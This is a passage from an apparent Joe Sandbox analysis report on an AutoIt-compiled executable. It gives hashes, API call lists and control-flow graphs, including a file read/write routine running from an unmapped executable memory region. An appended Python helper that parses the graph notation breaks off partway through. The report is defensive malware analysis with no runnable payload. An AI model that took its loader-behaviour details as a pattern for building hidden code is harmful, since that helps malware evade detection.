• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
• String ID:
• API String ID: 1500180987-0
• Opcode ID: 1fdc1389585ee25c9ba0c3a9ed97a450cce0af2ebfbc5111a641a9f349b24362
• Instruction ID: 02a21988af13e7247216c1d96107bbd8e14577c6ac0cce12fd44c5267f831f24
• Opcode Fuzzy Hash: 1fdc1389585ee25c9ba0c3a9ed97a450cce0af2ebfbc5111a641a9f349b24362
• Instruction Fuzzy Hash: 22C13DB1900129AADF11DF95CC81ADEB7BCEF85314F0040ABF609E6251EB749E858F69

Control-flow Graph (rendered graph not included)

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00403074
• RegisterClassExW.USER32(00000030), ref: 0040309E
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
• InitCommonControlsEx.COMCTL32(?), ref: 004030CC
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
• LoadIconW.USER32(000000A9), ref: 004030F2
• ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915
• Opcode ID: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
• Instruction ID: 4440f0663549e4d62e3da2fdffcae7bb40582d53fb7b12173dce245a48cd956c
• Opcode Fuzzy Hash: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
• Instruction Fuzzy Hash: 5F317A71801348AFDB50DFA4DC84A9DBFF0FB09310F24456EE480E62A0D7B91599CF69

Control-flow Graph (rendered graph not included)

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00403074
• RegisterClassExW.USER32(00000030), ref: 0040309E
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
• InitCommonControlsEx.COMCTL32(?), ref: 004030CC
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
• LoadIconW.USER32(000000A9), ref: 004030F2
• ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915
• Opcode ID: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
• Instruction ID: 5f72cbcfe52bedf9aac6cae92f5874e6cc1455117f94183018d2e1bba946cea4
• Opcode Fuzzy Hash: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
• Instruction Fuzzy Hash: DD21F9B1911208AFEB40EF94EC48B9DBBF4FB08700F10453AF511A62A0D7B555948FA9

Control-flow Graph (legend: Executed / Not Executed; rendered graph not included)
control_flow_graph 1296 40708b-4071b0 call 431940 call 407667 call 404706 call 42050b call 407cab call 403f74 call 407667 call 407d8c RegOpenKeyExW 1313 43e8b1-43e8cc RegQueryValueExW 1296->1313 1314 4071b6-4071d3 call 405904 * 2 1296->1314 1315 43e943-43e94f RegCloseKey 1313->1315 1316 43e8ce-43e90d call 420db6 call 40522e RegQueryValueExW 1313->1316 1315->1314 1318 43e955-43e959 1315->1318 1330 43e92b-43e931 1316->1330 1331 43e90f-43e929 call 407bcc 1316->1331 1321 43e95e-43e984 call 4079f2 * 2 1318->1321 1336 43e986-43e994 call 4079f2 1321->1336 1337 43e9a9-43e9b6 call 422bfc 1321->1337 1334 43e933-43e940 call 420e2c * 2 1330->1334 1335 43e941 1330->1335 1331->1330 1334->1335 1335->1315 1336->1337 1348 43e996-43e9a7 call 422d8d 1336->1348 1346 43e9b8-43e9c9 call 422bfc 1337->1346 1347 43e9dc-43ea16 call 407de1 call 403f74 call 405904 call 4079f2 1337->1347 1346->1347 1356 43e9cb-43e9db call 422d8d 1346->1356 1347->1314 1358 43ea1c-43ea1d 1347->1358 1348->1358 1356->1347 1358->1321
APIs
  • Part of subcall function 00404706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004C52F8,?,004037AE,?), ref: 00404724
  • Part of subcall function 0042050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00407165), ref: 0042052D
• RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 004071A8
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0043E8C8
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0043E909
• RegCloseKey.ADVAPI32(?), ref: 0043E947
• _wcscat.LIBCMT ref: 0043E9A0
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
• String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
• API String ID: 2673923337-2727554177
• Opcode ID: 3dc34742f8a7bc767ebd921b8f511a1c2b55e9980e44eb1467a7df652b5eb101
• Instruction ID: d25a402f486e77f999364444344266e14871576642d40cf04fb282302ec68e46
• Opcode Fuzzy Hash: 3dc34742f8a7bc767ebd921b8f511a1c2b55e9980e44eb1467a7df652b5eb101
• Instruction Fuzzy Hash: E9718E71509301AEC340EF26E841D5BBBE8FF88314F51893FF445972A1DB79A948CB5A

Control-flow Graph (legend: Executed / Not Executed; rendered graph not included)
control_flow_graph 1366 403633-403681 1368 4036e1-4036e3 1366->1368 1369 403683-403686 1366->1369 1368->1369 1372 4036e5 1368->1372 1370 4036e7 1369->1370 1371 403688-40368f 1369->1371 1376 4036ed-4036f0 1370->1376 1377 43d0cc-43d0fa call 411070 call 411093 1370->1377 1373 403695-40369a 1371->1373 1374 40374b-403753 PostQuitMessage 1371->1374 1375 4036ca-4036d2 DefWindowProcW 1372->1375 1379 4036a0-4036a2 1373->1379 1380 43d154-43d168 call 462527 1373->1380 1381 403711-403713 1374->1381 1382 4036d8-4036de 1375->1382 1383 4036f2-4036f3 1376->1383 1384 403715-40373c SetTimer RegisterWindowMessageW 1376->1384 1412 43d0ff-43d106 1377->1412 1388 403755-403764 call 4044a0 1379->1388 1389 4036a8-4036ad 1379->1389 1380->1381 1405 43d16e 1380->1405 1381->1382 1385 4036f9-40370c KillTimer call 40443a call 403114 1383->1385 1386 43d06f-43d072 1383->1386 1384->1381 1390 40373e-403749 CreatePopupMenu 1384->1390 1385->1381 1398 43d074-43d076 1386->1398 1399 43d0a8-43d0c7 MoveWindow 1386->1399 1388->1381 1394 4036b3-4036b8 1389->1394 1395 43d139-43d140 1389->1395 1390->1381 1403 43d124-43d134 call 462d36 1394->1403 1404 4036be-4036c4 1394->1404 1395->1375 1401 43d146-43d14f call 457c36 1395->1401 1407 43d097-43d0a3 SetFocus 1398->1407 1408 43d078-43d07b 1398->1408 1399->1381 1401->1375 1403->1381 1404->1375 1404->1412 1405->1375 1407->1381 1408->1404 1413 43d081-43d092 call 411070 1408->1413 1412->1375 1416 43d10c-43d11f call 40443a call 40434a 1412->1416 1413->1381 1416->1375
APIs
• DefWindowProcW.USER32(?,?,?,?), ref: 004036D2
• KillTimer.USER32(?,00000001), ref: 004036FC
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0040371F
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0040372A
• CreatePopupMenu.USER32 ref: 0040373E
• PostQuitMessage.USER32(00000000), ref: 0040374D
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
• String ID: TaskbarCreated$%I
• API String ID: 129472671-1195164674
• Opcode ID: 966edbd5f2e312d4ba3a9f2ebc71c219dc323684879314e6e103aa33e8c5c9c6
• Instruction ID: dec945db719cbeb7d7ffc5e313a4f07f26295059660cff28048481092df75402
• Opcode Fuzzy Hash: 966edbd5f2e312d4ba3a9f2ebc71c219dc323684879314e6e103aa33e8c5c9c6
• Instruction Fuzzy Hash: F34127B1110505ABDB246F68EC09F7E3E98EB44302F50453BF602A63E1C67EAD95972E

Control-flow Graph (rendered graph not included)

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00403A50
• LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
• LoadIconW.USER32(00000063), ref: 00403A76
• LoadIconW.USER32(000000A4), ref: 00403A88
• LoadIconW.USER32(000000A2), ref: 00403A9A
• LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
• RegisterClassExW.USER32(?), ref: 00403B16
  • Part of subcall function 00403041: GetSysColorBrush.USER32(0000000F), ref: 00403074
  • Part of subcall function 00403041: RegisterClassExW.USER32(00000030), ref: 0040309E
  • Part of subcall function 00403041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
  • Part of subcall function 00403041: InitCommonControlsEx.COMCTL32(?), ref: 004030CC
  • Part of subcall function 00403041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
  • Part of subcall function 00403041: LoadIconW.USER32(000000A9), ref: 004030F2
  • Part of subcall function 00403041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                  • String ID: #$0$AutoIt v3
                                                                                                                                                  • API String ID: 423443420-4155596026
                                                                                                                                                  • Opcode ID: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
                                                                                                                                                  • Instruction ID: 95199bfa57b98a40bbf2a31e3c8143aaf86e5cd3d1ec7ed5ae4cf298cf618104
                                                                                                                                                  • Opcode Fuzzy Hash: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
                                                                                                                                                  • Instruction Fuzzy Hash: C4214874D00308AFEB50DFA4EC09F9D7BF4FB08711F1045BAE500A62A1D3B966948F88
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 19edc407825cce52eea09134cde590bd2fb46b739610e2103297ed04bd5629fa
                                                                                                                                                  • Instruction ID: be9ef2f66b9db8652bf956f779760dac068c5661b6891f5dcbcf2d48cd877f4a
                                                                                                                                                  • Opcode Fuzzy Hash: 19edc407825cce52eea09134cde590bd2fb46b739610e2103297ed04bd5629fa
                                                                                                                                                  • Instruction Fuzzy Hash: 89A269729093808FC735CB18CC547AABBF1AFD5328F09CA5DE59C97292D335A9048B97

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                                                                                                  • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$RL
                                                                                                                                                  • API String ID: 1825951767-3937808951
                                                                                                                                                  • Opcode ID: bdb735fbedb35e888c257e8634ea341575bcf89834c003d18e08814175aecafe
                                                                                                                                                  • Instruction ID: 217e4a9907ead401ca9bb1711b2953d037e75f133ca24ff269f2dfb0051b1760
                                                                                                                                                  • Opcode Fuzzy Hash: bdb735fbedb35e888c257e8634ea341575bcf89834c003d18e08814175aecafe
                                                                                                                                                  • Instruction Fuzzy Hash: DAA13CB29102199ACB04EFA1DC91EEEBB78BF14314F40053FE415B7191DB786A08CBA9

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00420162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
                                                                                                                                                    • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
                                                                                                                                                    • Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
                                                                                                                                                    • Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
                                                                                                                                                    • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
                                                                                                                                                    • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1
                                                                                                                                                    • Part of subcall function 004160F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0040F930), ref: 00416154
                                                                                                                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0040F9CD
                                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 0040FA4A
                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004445C8
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                  • String ID: <WL$\TL$%I$SL
                                                                                                                                                  • API String ID: 1986988660-4199584472
                                                                                                                                                  • Opcode ID: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
                                                                                                                                                  • Instruction ID: cacde0f204b6a9090d7281a683cdea215049a4593ae0d5a2ec8f4d386ae10ecf
                                                                                                                                                  • Opcode Fuzzy Hash: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
                                                                                                                                                  • Instruction Fuzzy Hash: 6581ADB4901A809EC3C8EF3AA944F5D7BE5AB9830A790853F9419C7272E77874C58F1D

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  control_flow_graph 2109 4039d5-403a45 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                  APIs
                                                                                                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
                                                                                                                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
                                                                                                                                                  • ShowWindow.USER32(00000000,?,?), ref: 00403A38
                                                                                                                                                  • ShowWindow.USER32(00000000,?,?), ref: 00403A41
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$CreateShow
                                                                                                                                                  • String ID: AutoIt v3$edit
                                                                                                                                                  • API String ID: 1584632944-3779509399
                                                                                                                                                  • Opcode ID: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
                                                                                                                                                  • Instruction ID: be7595edf0713681b26590b93805f6b8ae52c85786ba9eb407d90bea5093dcab
                                                                                                                                                  • Opcode Fuzzy Hash: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
                                                                                                                                                  • Instruction Fuzzy Hash: 5DF03A705002907EEB705723AC48E2F2EBDD7C6F50B00407EB900E2170C2752881CEB8

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  control_flow_graph 2462 bf6920-bf6972 call bf6820 CreateFileW 2465 bf697b-bf6988 2462->2465 2466 bf6974-bf6976 2462->2466 2469 bf699b-bf69b2 VirtualAlloc 2465->2469 2470 bf698a-bf6996 2465->2470 2467 bf6ad4-bf6ad8 2466->2467 2471 bf69bb-bf69e1 CreateFileW 2469->2471 2472 bf69b4-bf69b6 2469->2472 2470->2467 2474 bf6a05-bf6a1f ReadFile 2471->2474 2475 bf69e3-bf6a00 2471->2475 2472->2467 2476 bf6a43-bf6a47 2474->2476 2477 bf6a21-bf6a3e 2474->2477 2475->2467 2478 bf6a49-bf6a66 2476->2478 2479 bf6a68-bf6a7f WriteFile 2476->2479 2477->2467 2478->2467 2482 bf6aaa-bf6acf VirtualFree 2479->2482 2483 bf6a81-bf6aa8 2479->2483 2482->2467 2483->2467
                                                                                                                                                  APIs
                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00BF6965
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1738404215.0000000000BF6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BF6000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_bf6000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                  • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                                                                                                  • Instruction ID: 51788f229660c725dde1c14b5cc6b9f01939f9f0c76d433b03b1f5c28c87a219
                                                                                                                                                  • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                                                                                                  • Instruction Fuzzy Hash: 4C51DA75A50208FBDF20DFA4CC49FEE77B8EF48701F108554FA19EB180DA749A459B60
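The function at bf6920 is the one block in this section worth reading closely: it sits in a non-image, executable region (Source File based on PE: false, protection 00000040) and its graph chains CreateFileW, VirtualAlloc, a second CreateFileW, ReadFile, WriteFile and VirtualFree, with every API block also branching to the common exit at bf6ad4 (the failure path after each call is checked). Only the first CreateFileW has its arguments resolved on the page, so the access mode of the second open is not something the report supports; the read/write pairing is what the graph shows, nothing more. The script below is an added example (not Joe Sandbox code and not part of the report): it parses the report's own textual control_flow_graph notation, which is assumed from the lines on this page to be `<id> <start>-<end> <labels...>` for a block and `<a>->b` for an edge, with `<api> * n` meaning n calls, walks the graph to list the API calls on a path between two blocks, and decodes the CreateFileW argument list into the Win32 constant names. The two input strings are copied from the bf6920 block above; the block ids and the Win32 constant tables are the only assumptions.

```python
"""Parse a Joe Sandbox textual control-flow-graph line and decode the
CreateFileW argument list that accompanies it (added example)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed input: the two lines copied from the bf6920 function block above.
CFG_LINE = (
    "control_flow_graph 2462 bf6920-bf6972 call bf6820 CreateFileW "
    "2465 bf697b-bf6988 2462->2465 2466 bf6974-bf6976 2462->2466 "
    "2469 bf699b-bf69b2 VirtualAlloc 2465->2469 2470 bf698a-bf6996 2465->2470 "
    "2467 bf6ad4-bf6ad8 2466->2467 2471 bf69bb-bf69e1 CreateFileW 2469->2471 "
    "2472 bf69b4-bf69b6 2469->2472 2470->2467 2474 bf6a05-bf6a1f ReadFile "
    "2471->2474 2475 bf69e3-bf6a00 2471->2475 2472->2467 2476 bf6a43-bf6a47 "
    "2474->2476 2477 bf6a21-bf6a3e 2474->2477 2475->2467 2478 bf6a49-bf6a66 "
    "2476->2478 2479 bf6a68-bf6a7f WriteFile 2476->2479 2477->2467 "
    "2482 bf6aaa-bf6acf VirtualFree 2479->2482 2483 bf6a81-bf6aa8 2479->2483 "
    "2482->2467 2483->2467"
)
API_LINE = ("CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,"
            "00000080,00000000), ref: 00BF6965")


@dataclass
class Block:
    bid: int
    start: int                                   # first address, inclusive
    end: int                                     # last address as printed
    calls: List[str] = field(default_factory=list)   # API names / "call <addr>"
    succ: List[int] = field(default_factory=list)    # successor block ids


def parse_cfg(line: str) -> Dict[int, Block]:
    """Tokenise one control_flow_graph line into blocks with edges."""
    toks = line.split()
    assert toks[0] == "control_flow_graph"
    blocks: Dict[int, Block] = {}
    cur: Optional[Block] = None
    i = 1
    while i < len(toks):
        t = toks[i]
        m = re.fullmatch(r"(\d+)->(\d+)", t)
        if m:                                    # edge: source -> target
            blocks[int(m.group(1))].succ.append(int(m.group(2)))
        elif t.isdigit():                        # new block: "<id> <lo>-<hi>"
            lo, hi = toks[i + 1].split("-")
            cur = Block(int(t), int(lo, 16), int(hi, 16))
            blocks[cur.bid] = cur
            i += 1
        elif t == "call":                        # internal call: "call <addr>"
            cur.calls.append(f"call {toks[i + 1]}")
            i += 1
        elif t == "*":                           # "<api> * n": repeat last label
            cur.calls.extend([cur.calls[-1]] * (int(toks[i + 1]) - 1))
            i += 1
        else:                                    # a resolved API name
            cur.calls.append(t)
        i += 1
    return blocks


def api_sequence(blocks: Dict[int, Block], src: int, dst: int) -> Optional[List[str]]:
    """Calls along the first depth-first path from src to dst, or None."""
    def dfs(b: int, seen: set, path: List[str]) -> Optional[List[str]]:
        if b == dst:
            return path + blocks[b].calls
        seen.add(b)
        for s in blocks[b].succ:
            if s not in seen:
                r = dfs(s, seen, path + blocks[b].calls)
                if r is not None:
                    return r
        return None
    return dfs(src, set(), [])


# Win32 constants for the CreateFileW parameters (from the public SDK headers).
GENERIC = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
           0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
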